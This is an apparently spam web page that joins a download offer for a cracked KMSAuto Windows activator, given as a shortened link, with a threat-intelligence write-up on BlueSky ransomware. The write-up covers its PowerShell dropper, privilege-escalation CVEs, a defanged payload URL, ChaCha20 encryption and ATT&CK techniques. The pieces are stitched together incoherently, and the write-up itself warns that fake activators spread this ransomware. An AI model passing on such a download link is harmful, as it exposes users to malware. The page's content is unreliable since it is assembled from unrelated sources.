KMSAuto Net 2014 1.1.6 Portable Multi (Activator For Windows 8.1 64 Bit
Tanja Freeze
Based on the information available, it seems that BlueSky Ransomware hasn't shared any stolen data with the public yet. Also, the Bitcoin wallets linked to BlueSky Ransomware samples haven't been used for any transactions. This suggests that this threat is still in its infancy.
KMSAuto Net 2014 1.1.6 Portable Multi (Activator For Windows 8.1 64 bit
Download https://urlcod.com/2yN4d2
Although infection rates are currently minimal, the ransomware's characteristics, which are detailed below, suggest it has been meticulously crafted for a sustained operational campaign. In this post, we delve into the latest intelligence regarding BlueSky ransomware to aid security teams in bolstering their defenses against this emerging threat.
Significantly, before dropping the final BlueSky payload, the PowerShell dropper determines if it is being executed as a privileged user. If so, it moves to the next step and downloads and executes the ransomware payload. If not, it uses the following techniques to escalate local privileges, depending on the version of the host operating system. If the version of the host operating system is earlier than Windows 10, such as Windows 7, 8 or XP, then the script will download and execute a modified version of the local privilege escalation tool called JuicyPotato. If the host is running Windows 10 or later, then the script will download and execute ghost.exe and spooler.exe to exploit local privilege escalation vulnerabilities CVE-2020-0796 and CVE-2021-1732, respectively.
Vulnerabilities being exploited to gain privileges are as below.
After gaining additional privileges, PowerShell dropper downloads the final BlueSky ransomware payload from hxxps://kmsauto[.]us/someone/I.exe and saves it locally to the filesystem as javaw.exe, attempting to masquerade as a legitimate Windows application. Eventually, the sample executes from the file path
BlueSky drops the ransom note as a text file named # DECRYPT FILES BLUESKY #.txt and an HTML file named # DECRYPT FILES BLUESKY #.html in a local directory where it has encrypted files successfully and renamed them with the file extension .bluesky. The content of these 2 files is shown below.
File encryption limitations: Unlike other ransomware, which normally contains a list of file extensions to identify eligible files for encryption, BlueSky consists of a list of extensions that are negated in the file encryption process.
BlueSky Ransomware uses a multithreaded queue for the encryption process. It starts multiple threads, one responsible for file encryption, another for enumerating files on the local file system and mounted network shares to be added into the queue. Below is the flow chart for the same.
The file encryption of BlueSky Ransomware is similar to Babuk Ransomware. Where both use Curve25519 to generate a public key for the host and generate a shared key with the public key of the attacker. After generating an elliptic curve key pair, BlueSky computes a hash of the shared key, and uses it to generate a file encryption key for the ChaCha20 algorithm. Finally, it reads the file buffer, encrypts it with ChaCha20 and replaces the contents of the original file.
T1140 - Deobfuscate/Decode Files or Information: BlueSky downloader base64-decodes and decompresses data to unpack the next stage payload. BlueSky ransomware payload encrypts ransom note with rc4-based encryption, and it uses a custom encryption scheme to encrypt embedded strings.
Cyber criminals behind ransomware attacks are continuously adapting to advanced tactics, making it increasingly challenging for cybersecurity defenses to thwart their activities. These evolving techniques encompass encoding and encrypting malicious code, along with the implementation of multi-staged payload delivery methods. Notably, the BlueSky ransomware strain demonstrates exceptional proficiency by swiftly encrypting files on victim machines using multi-threaded processing capabilities. Furthermore, it employs obfuscation strategies, such as API hashing, to impede reverse engineering efforts by security analysts.
BlueSky ransomware shows that even today, cyber criminals still use basic but very effective social engineering techniques to deceive people. When we are looking for cracked software, we must know that there is always a price and, in this case, it is a ransomware with a high ransom. So, it is necessary to educate people not to install cracked software on company computers or personal devices. It is a simple but effective way to stop similar threats.
[1] -the-operators-of-the-newly-emerged-bluesky-ransomware
[2] -ransomware/
[3] -analysis-of-bluesky-ransomware
[4] -ransomware-ad-lateral-movement-evasion-and-fast-encryption-puts-threat-on-the-radar/
[5] -bluesky-ransomware-payload/